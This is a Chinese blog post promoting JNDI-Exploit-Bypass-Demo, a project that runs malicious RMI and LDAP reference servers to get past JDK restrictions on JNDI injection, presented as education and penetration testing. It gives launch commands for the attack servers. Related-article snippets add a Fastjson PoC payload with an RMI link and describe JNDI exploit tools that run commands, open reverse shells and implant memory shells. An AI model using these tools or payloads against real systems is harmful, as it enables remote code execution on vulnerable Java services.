推荐开源项目:JNDI-Exploit-Bypass-Demo —— 深入理解与绕过JNDI操纵限制的实战示例

最新推荐文章于 2024-08-08 07:21:51 发布
最新推荐文章于 2024-08-08 07:21:51 发布
阅读量424 收藏 10
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00017/article/details/139210037
版权

推荐开源项目:JNDI-Exploit-Bypass-Demo —— 深入理解与绕过JNDI操纵限制的实战示例

在Java世界中,JNDI(Java Naming and Directory Interface)是一种强大的工具,用于查找和绑定分布式环境中的对象。然而,不恰当的使用可能导致远程代码执行(RCE)的安全风险。JNDI-Exploit-Bypass-Demo 是一个开源项目,由资深安全研究者提供,旨在演示如何在JNDI操纵限制下进行攻击与防御的实战案例。

1、项目介绍

该项目提供了两个主要组件:HackerRMIRefServerHackerLDAPRefServer,分别针对RMI(Remote Method Invocation)和 LDAP(Lightweight Directory Access Protocol)两种常见服务的JNDI利用及防护策略的演示。通过运行这些实例,你可以深入理解JNDI漏洞的工作原理,并学习如何构建防范机制。

2、项目技术分析

JNDI-Exploit-Bypass-Demo 分析了JNDI注入攻击的常见限制,如白名单过滤、字符编码限制等。项目代码清晰地展示了如何构造恶意的RMI和LDAP引用,以绕过这些限制,实现远程代码执行。这不仅对安全研究人员有价值,也对负责代码审计和加固的开发者有着深远的意义。

3、项目及技术应用场景

  • 教育与培训:这个项目非常适合教学和自我学习,帮助开发者了解JNDI攻击的风险,并提高他们的安全意识。
  • 安全评估:渗透测试人员可以使用它来模拟攻击,检查目标系统对JNDI注入的防护程度。
  • 应用安全改进:开发团队可以在自己的软件中复现这些攻击场景,从而识别并修复潜在的安全漏洞。

4、项目特点

  1. 实战模拟:项目提供了实际的服务器端代码,可以直接运行体验攻击与防御过程。
  2. 详细文档:相关博客文章链接提供了深入的技术解析,便于理解和学习。
  3. 简单部署:使用Maven构建,只需一行命令即可启动服务器,易于上手操作。
  4. 社区支持:作者鼓励订阅其公众号以获取更多安全相关的资讯和更新。

通过JNDI-Exploit-Bypass-Demo,您可以从实战角度增强对JNDI安全性的理解,为您的项目增添一道坚实的防线。立即克隆项目,亲自动手实践吧!

git clone https://github.com/<username>/JNDI-Exploit-Bypass-Demo.git
cd JNDI-Exploit-Bypass-Demo
mvn package
java -cp HackerRMIRefServer-all.jar HackerRMIRefServer 0.0.0.0 8088 1099
java -cp HackerRMIRefServer-all.jar HackerLDAPRefServer  0.0.0.0 8088 1389

让我们一起探索安全领域的深度与广度,提升我们的技术水平!

赵鹰伟Meadow
关注
红队专题-注入攻击-Tools-JNDIExploit
aming小老弟
12-27 642
【代码】红队专题-注入攻击-Tools-JNDIExploit
jndi-JNDI-Injection-Exploit
12-27
java asm jndi_JNDI-Injection-Exploit,用于log4j2漏洞验证 可执行程序为jar包,在命令行中运行以下命令: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。 (可选项 , 默认命令是mac下打开计算器,即"open /Applications/Calculator.app") -A - 服务器地址,可以是IP地址或者域名。 (可选项 , 默认地址是第一个网卡地址) 注意: 要确保 1099、1389、8180端口可用,不被其他程序占用。 或者你也可以在run.ServerStart类26~28行更改默认端口。 命令会被作为参数传入Runtime.getRuntime().exec(), 所以需要确保命令传入exec()方法可执行。
使用JNDIExploit-1.2-SNAPSHOT.jar复现log4j2详细流程
m0_74196038的博客
03-19 1336
还有就是之所以这个实验做了两次,就是因为在这个实验当中,我第一次做的时候,由于这个复现是使用那个脚本,所以直接使用命令去开启http服务和ldap服务 ,但是我发现开启了http服务,但是没法访问到,我以为是环境的问题,就打算第二天再做。结果第二天还是不行,后来终于搞明白了,他这里使用工具开启http服务的指令,实际上并没有真正的开启http服务,只是做了一个端口监听,让靶机误以为开启了ldap服务和http服务。-i 指定开启服务的ip,也就是攻击者的ip,也可以是黑客的公网服务器。
JNDI-Injection-Exploit 使用教程
最新发布
gitblog_01056的博客
08-08 610
JNDI-Injection-Exploit 使用教程 JNDI-Injection-ExploitJNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)项目地址:https:/...
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
JNDI注入利用工具】JNDIExploit v1.1
qq_21039641的博客
07-04 1316
一款用于JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,集成了JDNI注入格式,能够更加方便的开启服务端后直接利用,支持反弹Shell命令执行、直接植入内存shell等,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。
JNDIExploit-1.2-SNAPSHOT
03-20
JNDIExploit-1.2-SNAPSHOT
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
2301_79837041的博客
04-11 2437
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞。
JNDI-Inject-Exploit
11-04
# JNDI-Inject-Exploit ## 免责声明 本工具仅面向**合法授权的企业安全测试**,如您需测试本工具的可用性请自行搭建靶机环境,在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的...
JNDIExploit-用于 JNDI注入利用的工具
04-16
一款用于 JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用 java -jar JNDIExploit.jar -h 查看参数...
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -...
JNDIExploit.zip
12-14
JNDIExploit
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
12-12
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
log4j2 JNDI注入漏洞问题复现
逗神的博客
12-13 4697
log4j2 JNDI注入漏洞问题复现
Bypass JNDI高版本限制
01-15 631
老早就知道 JNDI 注入存在高版本限制且有相应的绕过手法了,今天来分析分析绕过高版本限制的两种手法!
JNDIExploit使用方法
qq_50854662的博客
02-28 4104
JNDIExploit使用方法
Exploitng JNDI Injection In Java
测试
01-11 660
概要https://www.veracode.com/blog/research/exploiting-jndi-injections-java跟着这文章调了一遍, 之前一度以为在jdk 8u191之后, JNDI注入也就只能打打反序列了,看了这文章后发现了一种新的场景。之前JNDI注入都是依靠于getObjectFactoryFromReference时,如果目标classpath里找不到指定的...
探索JNDIExploit:揭秘Java Naming and Directory Interface (JNDI) 攻击工具
gitblog_00045的博客
03-26 483
探索JNDIExploit:揭秘Java Naming and Directory Interface (JNDI) 攻击工具 项目地址:https://gitcode.com/WhiteHSBG/JNDIExploit 项目简介 JNDIExploit 是一个开源项目,旨在帮助安全研究人员和开发者理解、检测与防御JNDI注入攻击。该项目提供了一系列实用工具,让你能够在可控环境中模拟这类攻击,从而...
探索Java安全新边界:JNDI-Inject-Exploit
gitblog_00011的博客
05-19 355
探索Java安全新边界:JNDI-Inject-Exploit JNDI-Inject-Exploit解决FastJson、Jackson、Log4j2、原生JNDI注入漏洞的高版本JDKBypass利用,探测本地可用反序列化gadget达到命令执行、回显命令执行、内存马注入项目地址:https://gitcode.com/gh_mirrors/jn/JNDI-Inject-Exploit 1、...
JavaEE5入门:JNDI与RMI详解——外卖菜单与服务接口
JavaEE5学习笔记02主要探讨了Java平台企业版(Java Enterprise Edition,Java EE)中的两个关键概念:JNDI(Java Naming and Directory Interface)和RMI(Remote Method Invocation)。JNDI是一个标准的Java命名和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

赵鹰伟Meadow

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值